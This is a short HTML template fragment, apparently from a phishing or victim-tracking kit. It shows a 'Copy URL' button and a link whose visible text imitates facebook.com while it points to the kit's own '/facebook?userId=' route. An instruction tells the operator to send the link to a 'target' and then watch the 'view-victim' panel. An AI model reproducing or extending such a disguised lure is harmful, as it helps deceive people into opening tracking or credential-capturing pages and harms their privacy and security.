<div class="content-inner">
    <div class="facebook">

        <div class="icon">
            <i class="fa-brands fa-facebook"></i>
        </div>

        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL()"><i class="fa-solid fa-link"></i> Copy URL</button>
            <a href="/facebook?userId=<%= userId %>">https//www.facebook.com</a>
        </div>

        <p><strong>Instruction:</strong> Copy the link and send it to your target, when the target hits in check your
            gods-eye(view-victim) </p>
    </div>

</div>
